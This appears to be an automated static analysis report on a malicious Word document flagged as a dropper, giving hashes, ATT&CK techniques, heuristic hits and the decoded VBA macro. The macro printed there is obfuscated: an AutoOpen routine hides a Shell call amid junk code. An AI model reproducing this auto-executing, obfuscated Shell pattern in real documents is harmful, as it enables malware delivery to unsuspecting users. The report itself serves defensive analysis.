Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08e5ddf49bd7033c…

MALICIOUS

Office (OLE)

136.5 KB Created: 2018-12-20 19:45:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 72ca7da1f84664dcf39dd58fa3532f79 SHA-1: 821e512e7bf0f5029604f85a735d409944dd43eb SHA-256: 08e5ddf49bd7033c1bdf0b422a3c510293f6c2bd68bac7aaf9656f1421253295
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, to execute commands. This strongly suggests the document's purpose is to download and execute a secondary payload, characteristic of a dropper. The ClamAV signature also identifies it as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Valyria-6791452-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6791452-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
          End Select
    i806603 = Array(Y90371, X13322673, w201271, Interaction.Shell(CVar("" + j299603 + I2117368 + B5424389 + Q30711310 + n7550609.TextBox1) + R32472235 + l64504798, 33 - 33), X9218589)
       Select Case V30365866289412
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    l7566742
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5152 bytes
SHA-256: 24f6c94b8bc0f6356bcec6f33e8de7e5f2bfd9e3645741ae22d2f1c683dc4be4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "n7550609"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
l7566742
End Sub

Attribute VB_Name = "t6272028496"
Function l7566742()
On Error Resume Next
   Select Case o3235378367683029487816
         Case 186403266
         Z265 = P741
            T510 = CInt(B789 / CByte(w254))
            P853 = l771
         Case 319526207
         F413 = L7367
         Y5713 = a3473
           w6221 = CInt(j900 / CByte(v487))
         Case 18153305
         b3886 = z705
         E965 = S1791
      End Select
   Select Case a1308167890389162865
         Case 210956575
         z7277 = h9277
            W470 = CInt(i236 / CByte(D579))
            q009 = v717
         Case 287634055
         Z919 = P6758
         K7944 = w680
           k9939 = CInt(M831 / CByte(z243))
         Case 213555218
         n915 = w830
         c3212 = n231
      End Select
   Select Case j405647239193822752
         Case 75797785
         c8467 = O1789
            z6775 = CInt(S1674 / CByte(f1134))
            r1092 = d0954
         Case 47057437
         F2232 = X378
         w057 = h9178
           m9252 = CInt(c097 / CByte(A365))
         Case 258971463
         q0723 = u3100
         j469 = X428
      End Select
i806603 = Array(Y90371, X13322673, w201271, Interaction.Shell(CVar("" + j299603 + I2117368 + B5424389 + Q30711310 + n7550609.TextBox1) + R32472235 + l64504798, 33 - 33), X9218589)
   Select Case V30365866289412
         Case 163737109
         K552 = D610
            z011 = CInt(c4204 / CByte(z3620))
            b0914 = Q0959
         Case 100188767
         X362 = c5204
         v2243 = v123
           C2364 = CInt(E1159 / CByte(r8418))
         Case 207320144
         m770 = J508
         i9215 = Y022
      End Select
   Select Case z768948010960087
         Case 318931518
         w8056 = B2323
            f3938 = CInt(I777 / CByte(F4989))
            b8597 = C3620
         Case 254641196
         I7834 = o7285
         A399 = j927
           V8903 = CInt(C3930 / CByte(a3515))
         Case 41865452
         t401 = f7354
         F615 = w554
      End Select
   Select Case w516262177896811
         Case 149478606
         R8545 = k642
            w8488 = CInt(H0152 / CByte(z941))
            q5289 = z2871
         Case 291916872
         i2048 = W1829
         U537 = X1208
           B0214 = CInt(A1223 / CByte(z2624))
         Case 199399231
         B4385 = n632
         k9930 = h915
      End Select
End Function


Attribute VB_Name = "v34186423828458"

Attribute VB_Name = "h6794249115"

Attribute VB_Name = "m1351836"

Attribute VB_Name = "C334442823186"

Attribute VB_Name = "a2128506"

Attribute VB_Name = "X94019886"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "m06034411"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "V673523271"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "u352230845"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "C6936320725"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "p476502477"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "I2918013329316"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False